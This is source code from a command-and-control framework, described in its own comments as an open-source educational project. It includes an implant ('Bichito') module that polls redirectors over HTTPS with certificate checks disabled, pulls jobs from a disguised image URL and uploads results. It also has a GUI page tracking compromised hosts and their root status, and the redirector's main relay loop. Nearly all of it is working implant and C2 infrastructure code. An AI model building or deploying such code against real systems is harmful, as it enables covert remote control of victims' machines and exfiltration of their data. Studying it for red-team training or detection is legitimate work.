| /* 30 | JSON Structures for Compiling Redirectors Network Module parameters 31 | Hive will have the same definitions in: ./src/hive/hiveImplants.go 32 | */ 33 | type BiSelfSignedhttps struct { 34 | Port string `json:"port"` 35 | Redirectors []string `json:"redirectors"` 36 | } 37 | 38 | var moduleParams *BiSelfSignedhttps 39 | 40 | /* 41 | Description: SelfSignedhttps,Prepare Redirector Slice 42 | Flow: 43 | A.JSON Decode redirector data 44 | B.Loop over each redirector and craft a working https endpoint to connect to 45 | */ 46 | func PrepareNetworkMocule(jsonstring string) []string{ 47 | 48 | var redirectors []string 49 | errDaws := json.Unmarshal([]byte(jsonstring),&moduleParams) 50 | if errDaws != nil{ 51 | return redirectors 52 | } 53 | for _,red := range moduleParams.Redirectors{ 54 | redirectors = append(redirectors,red +":"+ moduleParams.Port) 55 | } 56 | 57 | return redirectors 58 | } 59 | 60 | /* 61 | Description: SelfSignedhttps,Retrieve Jobs 62 | Flow: 63 | A.Prepare https client, configure the client to accept self-signed certificates 64 | B.Get request against target redirector to retrieve jobs 65 | */ 66 | func RetrieveJobs(redirector string,authentication string) ([]byte,string){ 67 | 68 | var newJobs []byte 69 | var error string 70 | 71 | //HTTP Clients Conf 72 | client := &http.Client{ 73 | Transport: &http.Transport{ 74 | DialContext:(&net.Dialer{ 75 | Timeout: 10 * time.Second, 76 | KeepAlive: 10 * time.Second, 77 | }).DialContext, 78 | 79 | //Skip TLS Verify since we are using self signed Certs 80 | TLSClientConfig:(&tls.Config{ 81 | InsecureSkipVerify: true, 82 | }), 83 | 84 | TLSHandshakeTimeout: 20 * time.Second, 85 | ExpectContinueTimeout: 10 * time.Second, 86 | ResponseHeaderTimeout: 10 * time.Second, 87 | }, 88 | 89 | Timeout: 30 * time.Second, 90 | } 91 | 92 | req, _ := http.NewRequest("GET", "https://"+redirector+"/image.jpg", nil) 93 | req.Header.Set("Authorization", authentication) 94 | res, err := client.Do(req) 95 | if err != nil { 96 | error = "Connection errir with redirector "+redirector+":"+err.Error() 97 | return newJobs,error 98 | } 99 | 100 | newJobs,_ = ioutil.ReadAll(res.Body) 101 | return newJobs,"Success" 102 | } 103 | 104 | /* 105 | Description: SelfSignedhttps,Retrieve Jobs 106 | Flow: 107 | A.Prepare https client, configure the client to accept self-signed certificates 108 | B.POST request against target redirector to send a job 109 | */ 110 | func SendJobs(redirector string,authentication string,encodedJob []byte) string{ 111 | 112 | var error string 113 | 114 | //HTTP Clients Conf 115 | client := &http.Client{ 116 | Transport: &http.Transport{ 117 | DialContext:(&net.Dialer{ 118 | Timeout: 10 * time.Second, 119 | KeepAlive: 10 * time.Second, 120 | }).DialContext, 121 | 122 | //Skip TLS Verify since we are using self signed Certs 123 | TLSClientConfig:(&tls.Config{ 124 | InsecureSkipVerify: true, 125 | }), 126 | 127 | TLSHandshakeTimeout: 10 * time.Second, 128 | ExpectContinueTimeout: 4 * time.Second, 129 | ResponseHeaderTimeout: 3 * time.Second, 130 | }, 131 | 132 | Timeout: 20 * time.Second, 133 | } 134 | 135 | req, _ := http.NewRequest("POST", "https://"+redirector+"/upload",bytes.NewBuffer(encodedJob)) 136 | req.Header.Set("Authorization", authentication) 137 | 138 | _, err := client.Do(req) 139 | if err != nil { 140 | error = "Connection error with redirector "+redirector+":"+err.Error() 141 | return error 142 | } 143 | 144 | return "Success" 145 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/bichito/bichito.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Bichito/Device Information

6 |
    7 |
  • 8 |
    • 9 |
  • 10 |
    • 11 |
12 |
13 |
14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 31 | 34 | 37 | 40 | 43 | 46 | 47 | 48 |
IDPIDArchOp. SystemOS VersionHostname
29 | 30 | 32 | 33 | 35 | 36 | 38 | 39 | 41 | 42 | 44 | 45 |
49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 65 | 68 | 71 | 74 | 77 | 80 | 81 | 82 |
MAC Addr. User NameAdmin/ROOT?Last SeenRedirector/Last AttachedStatus
63 | 64 | 66 | 67 | 69 | 70 | 72 | 73 | 75 | 76 | 78 | 79 |
83 |
84 |
85 |
86 |
87 | 88 | 89 |
90 |
91 |
92 |
93 |

Attacks

94 |
95 |
96 |
97 | 98 | 99 | 100 | 108 | 109 |
110 |
111 |
112 | 113 | 114 | 115 | 116 | 117 |
118 |
119 |
120 |
121 | 122 |
123 |
124 | 125 | -------------------------------------------------------------------------------- /src/redirector/redirector.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Redirector Main Function }}}}}}} 2 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 3 | 4 | 5 | package main 6 | 7 | import ( 8 | "strings" 9 | "os" 10 | "encoding/json" 11 | "bytes" 12 | "time" 13 | "fmt" 14 | "sync" 15 | ) 16 | 17 | /* 18 | JSON Structures for Compiling Redirectors and Implants (Bichito) 19 | These JSON structure will be passed to the go compiling process to provide most of the configurations related to which modules are active. 20 | Hive will have the same definitions in: ./src/hive/hiveImplants.go 21 | */ 22 | 23 | //Compiling-time JSON-Encoded Configurations for Redirector 24 | type RedConfig struct { 25 | Roaster string `json:"roaster"` 26 | HiveFingenprint string `json:"hivefingenprint"` 27 | Token string `json:"token"` 28 | BiToken string `json:"bitoken"` 29 | Saas string `json:"saas"` 30 | Offline string `json:"offline"` 31 | Coms string `json:"coms"` 32 | } 33 | 34 | type RedAuth struct { 35 | Domain string `json:"domain"` 36 | Token string `json:"token"` 37 | } 38 | 39 | 40 | /* 41 | This JSON Object definition is needed in the redirector to wrap within Jobs the RID of the redirector (same definition) 42 | Hive will have the same definitions in: ./src/hive/hiveDB.go 43 | */ 44 | type Job struct { 45 | Cid string `json:"cid"` // The client CID triggered the job 46 | Jid string `json:"jid"` // The Job Id (J-), useful to avoid replaying attacks 47 | Pid string `json:"pid"` // Parent Id, when the job came completed from a Implant, Pid is the Redirector where it cames from 48 | Chid string `json:"chid"` // Implant Id 49 | Job string `json:"job"` // Job Name 50 | Time string `json:"time"` // Time of creation 51 | Status string `json:"status"` // Sent - Processing - Finished 52 | Result string `json:"result"` // Job output data 53 | Parameters string `json:"parameters"` // Parameters will be JSON serialized to provide flexibility 54 | } 55 | 56 | 57 | //Redirector "on-memory" Job slices to manage Jobs that are being sent to Hive, or to an Implant 58 | type JobsToHive struct { 59 | mux sync.RWMutex 60 | Jobs []*Job 61 | } 62 | 63 | type JobsToBichito struct { 64 | mux sync.RWMutex 65 | Jobs []*Job 66 | } 67 | 68 | type lockObject struct { 69 | mux sync.RWMutex 70 | Lock int 71 | } 72 | 73 | var lock *lockObject 74 | 75 | 76 | //On Compile variables: 77 | /* 78 | parameters --> JSON Encoded String with all Redirector and Network Module data 79 | redconfig --> JSON Object where parameters will be decoded to 80 | authbearer --> Redirector JSON Object Credentials for the header 81 | rid --> Redirector RID 82 | jobsToHive --> Jobs to Hive on memory slice 83 | jobsToBichito --> Jobs to Implants on memory slice 84 | */ 85 | var( 86 | parameters string 87 | redconfig *RedConfig 88 | authbearer string 89 | rid string 90 | 91 | jobsToHive *JobsToHive 92 | jobsToBichito *JobsToBichito 93 | ) 94 | 95 | /* 96 | Description: Redirector Main Function 97 | Flow: 98 | A.Decode On compiled JSON string with redirector configurations 99 | B.Get the Server Hostname. 100 | B1. If the redirector is a SaaS//Offline, the hostname need to be pre-set 101 | C.Encode the Authenthication Header for login to Hive 102 | D.Initialize the "on-memory" Slices for the Jobs to be sent to Hive or to be sent to Implants connected 103 | E.Start the checking routine against hive to fet the RID 104 | F.Once the check-in is completed, start the target "network module" handler to receive/query Implants connections. The Function to 105 | execute will depend of the network module selected. 106 | */ 107 | func main() { 108 | 109 | //Decode Redirector Parameters 110 | errDaws := json.Unmarshal([]byte(parameters),&redconfig) 111 | //Create authbearer for redirector checking and authorization process with Hive 112 | hostname,errorH := os.Hostname() 113 | if (errorH != nil) || (errDaws != nil){ 114 | //This should create error logs, but have not even made checking yet 115 | fmt.Println("Error on parameters JSon decoding or getting hostname\n") 116 | } 117 | 118 | if redconfig.Saas != ""{ 119 | hostname = redconfig.Saas 120 | }else if redconfig.Offline != ""{ 121 | hostname = redconfig.Offline 122 | } 123 | 124 | 125 | 126 | authbearerO := RedAuth{hostname,redconfig.Token} 127 | bufRP := new(bytes.Buffer) 128 | json.NewEncoder(bufRP).Encode(authbearerO) 129 | resultRP := bufRP.String() 130 | authbearer = resultRP 131 | authbearer = strings.TrimSuffix(authbearer, "\n") 132 | 133 | //Initialize on memory slices for redirect Jobs 134 | var jobs []*Job 135 | jobsToHive = &JobsToHive{Jobs:jobs} 136 | jobsToBichito = &JobsToBichito{Jobs:jobs} 137 | lock = &lockObject{Lock:0} 138 | 139 | // Keep pinging Hive each 5 seconds till checking is done 140 | for{ 141 | rid = checking() 142 | if strings.Contains(rid,"R-"){ 143 | break 144 | } 145 | fmt.Println("Checking failed:"+rid) 146 | time.Sleep(5 * time.Second) 147 | } 148 | 149 | //Once hive cheking is performed, start the network module handler (will change between modules) 150 | bichitoHandler() 151 | } --------------------------------------------------------------------------------